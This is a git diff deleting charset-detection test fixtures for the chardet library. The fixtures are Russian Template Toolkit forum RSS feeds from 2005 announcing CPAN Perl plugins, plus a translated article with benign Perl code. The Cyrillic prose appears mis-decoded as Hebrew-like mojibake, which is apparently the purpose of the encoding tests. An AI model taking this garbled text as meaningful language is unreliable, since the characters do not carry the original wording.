דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CH/CHOLET/Template-Multilingual-0.02.tar.gz">ׂױאב״ן 0.02 װדן Template::Multilingual</a>. ֽגג װדל ןׂןױגבן א״׳ׂװכ ג Template ״ אױװ׀׃׀ױג אױ׀״׳׀ז״מ װװױאײ״ ױבל״ו ן׳כׂ ׂ ט׀ׁ׀ו.<br /><br />÷װ:<br /><div class="code"><pre>use Template::Multilingual; -my $template = Template::Multilingual-&gt;new(); -$template-&gt;language('en'); -$template-&gt;process('example.ttml');</pre></div><br />ָ׀ׁ:<br /><div class="code"><pre> -&lt;t&gt; - &lt;en&gt;Hello!&lt;/en&gt; - &lt;fr&gt;Bonjour!&lt;/fr&gt; - &lt;ru&gt;¿א״ׂױג!&lt;/ru&gt; -&lt;/t&gt;</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-75.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - Mon, 4 Apr 2005 06:03:55 GMT - Template::Plugin::TagRescue - ׀׃״ װן ׂכװױױ״ן גױ׃ׂ html ב ״במחױ״ױ - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - ¾דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-TagRescue-0.06.tar.gz">ׂױאב״ן 0.06 װדן Template::Plugin::TagRescue</a>. ¼װדל ׂכװױןױג א״ ׂכׂװױ (ג.ױ. ׳׀ױןױג &lt; &gt; &amp; &quot; ׀ בגׂױגבׂדמי״ױ entities) גױ׃״ html ׳׀ ״במחױ״ױ ד׀׳׀כו.<br /><br /><div class="code"><pre>[% USE TagRescue %] - -[% FILTER html_except_for('b') -%] -&lt;B&gt;¶״אכ!&lt;/B&gt; and &lt;I&gt;÷דאב״ׂ!&lt;/I&gt;&lt;BR&gt; -[%- END %] - -# ²כׂװ: -# &lt;B&gt;¶״אכ!&lt;/B&gt; and &amp;lt;I&amp;gt;Italic!&amp;lt;/I&amp;gt;&amp;lt;BR&amp;gt; - -[% '&lt;B&gt;¶״אכ!&lt;/B&gt; and &lt;I&gt;÷דאב״ׂ!&lt;/I&gt;&lt;BR&gt;' | html_except_for('i','br') %] - -# ²כׂװ: -# &amp;lt;B&amp;gt;Bold!&amp;lt;/B&amp;gt; and &lt;I&gt;Italic!&lt;/I&gt;&lt;BR&gt; - -[% taglist = ['b', 'br']; '&lt;B&gt;¶״אכ!&lt;/B&gt; ״ &lt;I&gt;÷דאב״ׂ!&lt;/I&gt;&lt;BR&gt;' | html_except_for(taglist) %] - -# ²כׂװ: -# &lt;B&gt;¶״אכ!&lt;/B&gt; ״ &amp;lt;I&amp;gt;÷דאב״ׂ!&amp;lt;/I&amp;gt;&lt;BR&gt;</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-74.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - Tue, 29 Mar 2005 12:46:04 GMT - Template::Plugin::HTML::BBCode - אױׁא׀׳ׂ׀״ױ BBCode ׂ HTML - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - ½׀ CPAN דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/L/LI/LIOL/Template-Plugin-HTML-BBCode-0.01.tar.gz">ׂױאב״ן 0.01 װדן Template::Plugin::HTML::BBCode</a>. ¼װדל ןׂןױגבן ׁױאג ׂאד׃ װדן HTML::BBCode ״ אױװבג׀ׂןױג ה״לגא bbcode, גאכ ׳׀ױןױג גױ׃״ א׀׳ױג״ BBCode ׀ בגׂױגבׂגדמי״ױ גױ׃״ HTML.<br /><br /><div class="code"><pre>[%- USE HTML::BBCode -%] -[% FILTER bbcode %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %] - -[%- USE HTML::BBCode( 'bbcode_limited' - allowed_tags = [ 'b', 'i', 'u' ] -) -%] -[% FILTER bbcode_limited %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-72.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - Sun, 27 Mar 2005 11:07:13 GMT - Template::Plugin::DBM::Deep - ״גױאהױב pure perl DBM - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - ½׀ CPAN דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/M/ME/MERLYN/Template-Plugin-DBM-Deep-0.02.tar.gz">ׂױאב״ן 0.02 װדן Template::Plugin::DBM::Deep</a>. ¼װדל אױװבג׀ׂןױג ״גױאהױב װדמ DBM::Deep.<br /><br /><div class="code"><pre> - [% USE db = DBM.Deep(file = &quot;my.db&quot; locking = 1 autoflush = 1); - db.lock; - db.flintstones = { &quot;flintstone&quot; = [&quot;fred&quot; &quot;wilma&quot;] - &quot;rubble&quot; = [&quot;barney&quot; &quot;betty&quot;] }; - db.castaways = [&quot;gilligan&quot; &quot;skipper&quot; &quot;professor&quot; &quot;and the rest&quot; ]; - db.unlock; - -%] - ... - [% db.flintstones.rubble.0; %] -- barney - [% db.castaways.3; %] -- and the rest -</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-71.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - Mon, 14 Mar 2005 12:35:02 GMT - ExtUtils::ModuleMaker::TT - װ׃גׂ׀ װדן װ״בגא״ׁדז״״ ״׳ TT-ט׀ׁׂ - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - ½׀ CPAN דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/D/DA/DAGOLDEN/ExtUtils-ModuleMaker-TT-0.74.tar.gz">ׂױאב״ן 0.74 װדן ExtUtils::ModuleMaker::TT</a>. ¼װדל ׳ׂןױג בגא״גל בג׀װ׀אגכױ ה׀כ, ׂוװןי״ױ ׂ בבג׀ׂ װ״בגא״ׁדג״ׂ׀ װדן (README, Changes, Todo, Build.PL, Makefile.PL, Proxy_Makefile.PL, MANIFEST.SKIP, test.t, module.pm), ״׳ ט׀ׁׂ TT. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-68.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - Mon, 14 Mar 2005 12:21:55 GMT - Template::Plugin::String::Compare - בא׀ׂױ״ױ בגא - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - ½׀ CPAN דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-String-Compare-0.01.tar.gz">ׂױאב״ן 0.01 ׀׃״׀ Template::Plugin::String::Compare</a>, גאכ ׳ׂןױג בא׀ׂ״ׂ׀גל בגא״ ׂ בגאׂ גױבגױ.<br /><br /><div class="code"><pre> -[% IF '2005-03-01' &lt; '2005-04-01' %] -ֲ׀ױ בא׀ׂױ״ױ אׂװ״גבן ׂ ח״בׂ גױבגױ. -[% END %] - -[% USE String.Compare %] -[% IF String.Compare.new('2005-03-01') &lt; '2005-04-01' %] -ֽג בא׀ׂױ״ױ א״בוװ״ג ׂ בגאׂ גױבגױ. -[% END %] -</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-67.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - Sat, 19 Feb 2005 08:23:15 GMT - ֱאױװ׀ װן א׀׳א׀ׁג״ eCommerece א״ײױ״ Handel - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - ½׀ CPAN דׁ״ׂ׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CL/CLACO/Handel-0.04.tar.gz">װדל Handel (ׂױאב״ן 0.04)</a>. ֽגג װדל אױװבג׀ׂןױג באױװד װן א׀׳א׀ׁג״ eCommerece א״ײױ״ ב װװױאײ AxKit ״ Template Toolkit. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-63.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - Thu, 17 Feb 2005 07:27:20 GMT - Template::Plugin::SSI - ״בל׳ׂ׀״ױ SSI ׂ ט׀ׁ׀ו - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - ½׀ CPAN דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CO/COREY/Template-Plugin-SSI-0.11.tar.gz">ׂױאב״ן 0.11 Template::Plugin::SSI</a>. ¼װדל ןׂןױגבן ׁױאג ׂאד׃ CGI::SSI ״ ׳ׂןױג ״בל׳ׂ׀גל ׂ ט׀ׁ׀ו SSI-װ״אױג״ׂכ.<br /><br /><div class="code"><pre>[% USE SSI %] - -# ׂמחױ״ױ (virtual) ה׀׀ /foo/bar.inc.html -[% SSI.include('virtual', '/foo/bar.inc.html') %] - -# ׂמחױ״ױ ה׀׀ /foo/bar.inc.html -[% SSI.include('file', '/var/www/html/foo/bar.inc.html') %] - -# ׂכ״גל ׀װד -[% SSI.exec('cmd', 'ls') %] - -# ׂכ״גל cgi בא״ג -[% SSI.exec('cgi', '/cgi-bin/foo.cgi') %] - -# דבג׀ׂ״גל ױאױױדמ ה״׃דא׀ז״״ ('sizefmt', 'timefmt', ״״ 'errmsg') -[% SSI.config('timefmt', &quot;%Y&quot;) %] - -# ׂכׂױבג״ ׀ׁא ױאױױדמ אדײױ״ן -[% SSI.echo('DATE_LOCAL') %] - -# דבג׀ׂ״גל ׀לדמ ױאױױדמ ($name = 'Corey') -[% SSI.set('name', 'Corey') %] - -# ׂכׂױבג״ װ׀גד בױװױ װ״ה״׀ז״״ 'index.html' -[% SSI.flastmod('file', 'index.html') %] - -# ׂכׂױבג״ א׀׳ױא ה׀׀ 'index.html' -[% SSI.fsize('file', 'index.html') %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-62.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.8.xml b/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.8.xml deleted file mode 100644 index 4f7fe88..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.8.xml +++ /dev/null @@ -1,228 +0,0 @@ - - - - - ִאדכ Template Toolkit : ±״ׁ״גױ״ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_forum/forum_id-8.html?rss - Template Toolkit - ׁכבגא׀ן, י׀ן ״ א׀בט״אןױ׀ן ב״בגױ׀ ׁא׀ׁג״ ט׀ׁׂ. ½׀ ב׀גױ א׀ׁג׀ױג האד, ׂ גא ׁבדײװ׀מגבן ׂאבכ ״בל׳ׂ׀״ן ׁ״ׁ״גױ״ א׀ׁגױ ב ט׀ׁ׀״. Text::Template, HTML::Template, Mason ״ װאד׃״ױ ׁ״ׁ״גױ״ - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Thu, 17 Mar 2005 12:03:32 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט׀ׁכ ׂ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - Tue, 28 Dec 2004 19:07:19 GMT - ְ׀׳װױױ״ױ װ׀, אױװבג׀ׂױ״ן, ״ ה״׃דא׀ז״״ - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - ½׀ <a target="_blank" href="http://www.theperlreview.com/">Perl Review</a> דׁ״ׂ׀׀ בג׀גלן ±א׀׀׀ װױ ִן (brian d foy) &quot;Separating Code, Presentation, and Configuration&quot;. ½״ײױ א״ׂװ״גבן ױאױׂװ בג׀גל״.<br /><br /><span style="font-weight:bold">÷א׀ג״ ׁ׳א.</span><br /><br />ֿ ׂ׳ן א׃א׀ד ״׳ אױװכװדיױ בג׀גל״ ״ א׀׳װױ״ װ, אױװבג׀ׂױ״ױ ״ ה״׃דא׀ז״מ, חגׁכ בװױ׀גל א׃א׀ד ׁױױ ׃״ׁ ״ ױ׃ װן װװױאײ״.<br /><br /><span style="font-weight:bold">1. ²ׂױװױ״ױ.</span><br /><br />² בױװױ ׂכדבױ ן אױװבג׀ׂ״ א׃א׀ד, גאדמ ן ״בל׳דמ װן ג׃, חגׁכ ׳׀ׁ״א׀גל ״ גׁא׀ײ׀גל Rich Site Summaries (RSS) ב װאד׃״ו ׂױׁ-ב׀גׂ<span style="font-weight:bold"><sup>1</sup></span>. ² װױ ן ״בל׳ׂ׀ ״גױא׀לכױ ׂױ״ח״כ, חגׁכ ד׀׳׀גל ׀״ױ ה׀כ ׳׀׃אדײ׀גל ״ ׀ אױװבג׀ׂןגל װ׀כױ, ״ ׁױי׀ חג ׂ םג ׂכדבױ ן םג ״בא׀ׂמ.<br /><br /><span style="font-style:italic">»״בג״׃ 1</span> בװױאײ״ג א׃א׀ד, גאדמ ן אױװבג׀ׂן ׂ אױװכװדיױ ׂכדבױ. ² ׀בב״ׂױ <span style="font-weight:bold">@files</span> וא׀ןגבן ה׀כ, גאכױ ױׁוװ״ ׳׀׃אד׳״גל, <span style="font-weight:bold">$base</span> - ׀ג׀׃, ׃װױ בוא׀ןױגבן ׂכׂװ, ״ ױבל ׂכא׀ײױ״ <span style="font-weight:bold">print</span> ב׳װ׀מג HTML ב װבג׀ׂ אבגכו ױאױױכו (חג אױװחג״גױלױױ ב׀ײױ חױ ״בל׳ׂ׀גל HTML-הדז״״ װדן CGI). ֽג ױ׃״ׁ״ ״ גאדװכ װן באׂײװױ״ן װ. ÷׃װ׀ ן ׳׀וחד ױןגל ב״ב ב׀גׂ ״״ ׂכׂװ, ן א״בדמ ב׀גל א׃א׀ד, ױב״ ׀ׁױאד חג-ג ױא׀ׂ״ל ״״ בװױ׀מ װאד׃דמ ט״ׁד.<br /><br /><span style="font-style:italic">»״בג״׃ 1: ·׀׃אד׳ח״ RSS ב ײױבגא״ב׀כ״ ׳׀חױ״ן״.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use XML::RSS; -6 -7 my @files = qw( -8 http://use.perl.org/useperl.rss -9 http://search.cpan.org/rss/search.rss -10 http://jobs.perl.org/rss/standard.rss -11 http://www.perl.com/pace/perlnews.rdf -12 http://www.perlfoundation.org/perl-foundation.rdf -13 http://www.stonehenge.com/merlyn/UnixReview/ur.rss -14 http://www.stonehenge.com/merlyn/WebTechniques/wt.rss -15 http://www.stonehenge.com/merlyn/LinuxMag/lm.rss -16 ); -17 -18 my $base = '/usr/home/comdog/TPR/rss-html'; -19 -20 foreach my $url ( @files ) -21 { -22 my $file = $url; -23 -24 $file =~ s|.*/||; -25 -26 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -27 -28 unless( $result ) -29 { -30 warn &quot;Could not open [$file] for writing! $!&quot;; -31 next; -32 } -33 -34 select $fh; -35 -36 my $rss = XML::RSS-&gt;new(); -37 my $data = get( $url ); -38 $rss-&gt;parse( $data ); -39 -40 my $channel = $rss-&gt;{channel}; -41 my $image = $rss-&gt;{image}; -42 -43 print &lt;&lt;&quot;HTML&quot;; -44 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -45 &lt;table cellpadding=5&gt; -46 &lt;tr&gt;&lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -47 HTML -48 -49 if( $image-&gt;{url} ) -50 { -51 my $img = qq|&lt;img src=&quot;$$image{url}&quot; alt=&quot;$$channel{title}&quot;&gt;|; -52 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$img&lt;/a&gt;&lt;br&gt;\n|; -53 } -54 else -55 { -56 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$$channel{title}&lt;/a&gt;&lt;br&gt;\n|; -57 } -58 -59 print &lt;&lt;&quot;HTML&quot;; -60 &lt;font size=&quot;-1&quot;&gt;$$channel{description}&lt;/font&gt; -61 &lt;/td&gt;&lt;/tr&gt; -62 &lt;tr&gt;&lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -63 HTML -64 -65 foreach my $item ( @{ $rss-&gt;{items} } ) -66 { -67 print qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -68 } -69 -70 print &lt;&lt;&quot;HTML&quot;; -71 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; -72 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -73 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -74 HTML -75 -76 close $fh; -77 }</pre></div><br /><br /><span style="font-weight:bold">2. ¾גװױױ״ױ אױװבג׀ׂױ״ן.</span><br /><br />ֵאט״ װ״׳׀ ױ בׂן׳כׂ׀ױג בױׁן ב ח׀בגכ אױװבג׀ׂױ״ױ װ׀כו. ¼ן א׃א׀׀ װײ׀ ׳׀ׁא׀גל װ׀כױ ״ בװױ׀גל ״ו װבגדכ״ חױד-ג, חג ״ו אױװבג׀ׂןױג - ג, חג ן א׀ׁג׀מ ב RSS ױ װײ ״ױגל ׳׀חױ״ן. ֿ ׃ד ׳׀וגױגל א״׳ׂװ״גל HTML, TeX, אבג גױבג, ״״ װ׀ײױ ׀-ג הא׀ג, גאכ ױ ׃ד בױׁױ אױװבג׀ׂ״גל.<br /><br />²׳ײ ג-ג ׳׀וחױג ׀״ב׀גל בׁבגׂױדמ ב״בגױד װן א׀ׁגכ ב ט׀ׁ׀״, ױ א׀ׂ״גבן װדל Text::Template ¼׀א׀-´ײױב׀ ´״דב׀ (Mark-Jason Dominus). ¾ װױ׀ױג ׂבױ חג ױ ױׁוװ״, ױ גאױׁדױג װן בׂױ א׀ׁגכ װ״גױלכו א׃א׀ ״ ׀״ב׀ בגלמ ׀ Perl. ֳ ױ׃ אבג ״גױאהױב ״ ױ ױ גאױׁדױגבן ״׳דח׀גל ן׳כ ט׀ׁׂ, בלד ט׀ׁכ ״בל׳דמג Perl.<br /><br /><span style="font-style:italic">»״בג״׃ 2</span> - םג ג׀ ײױ א׃א׀׀, גל ׂױבג ׂױװאױ׃ HTML ״בל׳דױגבן Text::Template. ² בגאױ 5 ן ״אג״אדמ ױגװ fill_in_file(). ² בגאױ 13 ד׀׳כׂ׀מ ט׀ׁ, גאכ ׁדװד ״בל׳ׂ׀גל. ²ױבל HTML, ״בל׳דױכ א׃א׀, גױױאל ׂכױבױ ׂ ה׀ ט׀ׁ׀, א״ׂױװױכ ׂ <span style="font-style:italic">״בג״׃ױ 3</span>.<br /><br />¼װדל Text::Template ײױג א״״׀גל װ׀כױ ׀ וױט. ÷מח״ וױט׀ בג׀ׂןגבן ״ױ׀״ ױאױױכו ׂ ט׀ׁױ, ׀ ׳׀חױ״ן - ׳׀חױ״ן״ ױאױױכו ט׀ׁ׀, ׀ ג׀ײױ אױװױןמג ג״ ױאױױכו. µב״ ׳׀חױ״ױ וױט׀ אבג ב׀ןא, ױאױױ׀ן ט׀ׁ׀ ב׀ןא. µב״ ׳׀חױ״ױ וױט׀ - ׀״כ ׀בב״ׂ, ױאױױ׀ן ט׀ׁ׀ - ׀בב״ׂ, ״ ג׀ װ׀ױױ.<br /><br />¾ׁךױג, ב׳װ׀ׂ׀ױכ XML::RSS - ׀״כ וױט. ¼װדל אױװבג׀ׂןױג ׀ׁבגא׀גכ ״גױאהױב װן ב׳װ׀״ן, ױ װן װבגד׀. ֽג גח׀בג״ ״ױ ג, חג ן װײױ ױאױװ׀גל ױד ט׀ׁד. ² ט׀ׁױ <span style="font-weight:bold">$rss-&gt;channel</span>, גא׀ן ׂ ׀חױבגׂױ ׳׀חױ״ן בװױאײ״ג ׀״כ וױט, בג׀ׂ״גבן <span style="font-weight:bold">%channel</span>, ׀ <span style="font-weight:bold">$rss-&gt;items</span>, בװױאײ׀י׀ן ׀״כ ׀בב״ׂ בג׀ׂ״גבן <span style="font-weight:bold">@items</span>.<br /><br /><span style="font-style:italic">»״בג״׃ 2: ¸בל׳ׂ׀״ױ ט׀ׁ׀.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use Text::Template qw(fill_in_file); -6 use XML::RSS; -7 -8 my @files = qw( -9 http://use.perl.org/useperl.rss -10 ); -11 -12 my $base = '.'; -13 my $template = 'rss-html.tmpl'; -14 -15 foreach my $url ( @files ) -16 { -17 my $file = $url; -18 -19 $file =~ s|.*/||; -20 -21 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -22 -23 unless( $result ) -24 { -25 warn &quot;Could not open [$file] for writing! $!&quot;; -26 next; -27 } -28 -29 my $rss = XML::RSS-&gt;new(); -30 my $data = get( $url ); -31 $rss-&gt;parse( $data ); -32 -33 print fill_in_file( $template, HASH =&gt; $rss ); -34 close $fh; -35 }</pre></div><br /><br />²דגא״ ט׀ׁ׀ Text::Template ״בןױג ׁ״ װ׀, גאכױ ׀וװ״ג ױײװד ה״׃דאכ״ בׁ׀״. ¾ ׳׀ױןױג ׁ בױװ״ ׂכח״בױכ ׂכא׀ײױ״ױ. ¸ױ׀ ױאױױכו - מח״ וױט׀, בבכד ׀ גאכ ן ױאױװ׀ ׂ ׀חױבגׂױ ׀א׃דױג׀ הדז״״ fill_in_file() ׂ װױ, א״ׂױװױ ׂ <span style="font-style:italic">״בג״׃ױ 2</span>.<br /><br /><span style="font-style:italic">»״בג״׃ 3: HTML ט׀ׁ.</span><br /><div class="code"><pre>1 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -2 &lt;table cellpadding=5&gt; -3 &lt;tr&gt; -4 &lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -5 &lt;a href=&quot;{ $channel{link} }&quot;&gt;{ -6 -7 $image ? qq|&lt;img src=&quot;$image&quot; alt=&quot;$channel{title}&quot;&gt;| : $channel{title} -8 -9 }&lt;/a&gt;&lt;br&gt; -10 -11 { $channel{description} } -12 &lt;/td&gt; -13 &lt;/tr&gt; -14 -15 &lt;tr&gt; -16 &lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -17 { -18 my $str; -19 -20 foreach my $item ( @items ) -21 { -22 $str .= qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -23 } -24 -25 $str; -26 }&lt;/font&gt;&lt;/td&gt; -27 &lt;/tr&gt; -28 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -29 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</pre></div><br /><br />÷׀ גל ב״בגױ׀ ט׀ׁׂ ׳׀װױבגׂ׀׀, ן ׃ד ױןגל אױװבג׀ׂױ״ױ ױ ױןן ׃״ד װ׀. µב״ ן א״ד אױטױ״ױ ״׳ױ״גל ׂ״װ אױװבג׀ׂױ״ן װ׀כו, ן ױןמ גל ט׀ׁ. µב״ ױ ׂױבג HTML גאױׁדױגבן אבג גױבג, ן גל ״׳ױמ װ ׂכ הא׀ג ט׀ׁ, ׀ םג בװױ׀ ׂ <span style="font-style:italic">״בג״׃ױ 4</span>.<br /><br /><span style="font-style:italic">»״בג״׃ 4: ָ׀ׁ װן ׁכח׃ גױבג׀.</span><br /><div class="code"><pre>1 { $channel{title} } -2 -3 { $channel{description} } -4 -5 { -6 my $str; -7 -8 foreach my $item ( @items ) -9 { -10 $str .= qq|* $$item{title}\n|; -11 } -12 -13 $str; -14 }</pre></div><br /><br /><span style="font-weight:bold">3. ¾גװױױ״ױ ה״׃דא׀ז״״.</span><br /><br />ֵאט״ װ״׳׀ ג׀ײױ ׳ׂןױג ׀װ׀ג״אׂ׀גל בא״ג א׀׳״חד אדײױ״מ. ² <span style="font-style:italic">״בג״׃ױ 1</span> ן ײױבג א״ב׀ ׳׀חױ״ױ װ״אױגא״״ װן ׂכׂװ׀, חג װױ׀ױג בא״ג ואד״ - ױב״ ן װ׀טןן װ״אױגא״ן ױןױגבן, בא״ג ב׀ױגבן. ÷אױ ג׃ <span style="font-style:italic">ׂ ״בג״׃ױ 2</span> ײױבג א״ב׀ ״ן ט׀ׁ׀, ױבגאן ׀ ג חג ן ׃ד ױןגל אױװבג׀ׂױ״ױ, ״׳ױןן ט׀ׁ. ¼ױ דײ ״ױגל ׂ׳ײבגל װ׀ׂ׀גל ׀ײװד ט׀ׁד בװױאײ׀גױלױ ״ן ׂױבג ״בל׳ׂ׀״ן װ׃ ״ ג׃ ײױ ״ױ״ װן א׀׳׃ בװױאײ״׃.<br /><br />¼׃״ױ בׁׂװ-װבגדכױ בא״גכ, גאכױ ן ׀טױ ׂ ¸גױאױג גאױׁדמג, חגׁכ ל׳ׂ׀גױל גאױװ׀ג״אׂ׀ ׂױאוממ ח׀בגל בא״ג׀ ״״ ׂמח׀ױדמ ׁ״ׁ״גױד, גא׀ן בװױאײ״ג גל ה״׃דא׀ז״כױ װ׀כױ. ֲ׀ װוװ גאױׁדױג, חגׁכ ױחכ ל׳ׂ׀גױל ׳׀ בׂכ ן׳כ׀ א׃א׀״אׂ׀״ן ״ א׀ׂ״ בא״ג - ט״ׁ׀ ב׀ױג בא״ג. ¿ו״ױ ה״׃דא׀ז״כױ װ׀כױ ׃דג א״ׂױבג״ ױײ״װ׀כ אױ׳דלג׀ג׀, ״ ױ ׀מג א׃א׀ד.<br /><br />ֿ ׃ד ד׀׳׀גל גױדי״ױ ה״׃דא׀ז״כױ װ׀כױ ױבל״״ בבׁ׀״ ״ ׀ײד גל װ״ ״׳ ״ו. °או״ׂ Comprehensive Perl Archive Network (CPAN)<span style="font-weight:bold"><sup>2</sup></span> בװױאײ״ג ױבל װדױ װן א׀׳ׁא׀ ה״׃דא׀ז״כו ה׀ׂ ׂ א׀׳״חכו הא׀ג׀ו ״״ ׀א׃דױגׂ ׀װ בגא״. ´״׳׀ױאכ װײכ ׂכׁ״א׀גל װוװ, גאכ דװׂױגׂאןױג ״ו דײװ׀.<br /><br />÷׃װ׀ ן ׂױאׂכױ ׀ח׀ גװױןגל װ׀כױ ה״׃דא׀ז״״ ג ״ו בא״גׂ, ן ױאױׁא׀ ױבל װדױ ׀ CPAN ״ בג׀ׂ״בן ׀ ConfigReader::Simple, גאכ ״בל׳דױג בגאחכ הא׀ג מח-׳׀חױ״ױ. ֿ ״בל׳ׂ׀ ױ׃ ׀בגל ח׀בג, חג ׀ח׀ גא׀ׂןגל ״ ״׳ױױ״ן ±ױד ¾ׁױא״ד (Bek Oberin), ׀ׂגאד א״׃״׀ל ׂױאב״״, ׳׀גױ בגלמ ׂ׳ן ׀ בױׁן װװױאײד װדן.<br /><br /><span style="font-style:italic">»״בג״׃ 5</span> ׀װ׀ג״אדױג <span style="font-style:italic">״בג״׃ 2</span> ״בל׳ׂ׀״מ ConfigReader::Simple. ֿ ב׳װ׀מ ׂכ ׁךױג ה״׃דא׀ז״״, ׳׀גױ ח״ג׀מ ׳׀חױ״ן ״׳ ׁךױג׀. ¼װדל אױׁא׀׳דױג ״ױ׀ מחױ ה״׃דא׀ז״״ ׂ ״ױ׀ ױגװׂ װן אבג׃ װבגד׀ (וגן װן װבגד׀ ׳׀חױ״ן מחױ ב ם׳ג״חױב״״ ״ױ׀״, גאכױ ױ ׃דג ׁכגל אױׁא׀׳ׂ׀כ ׂ 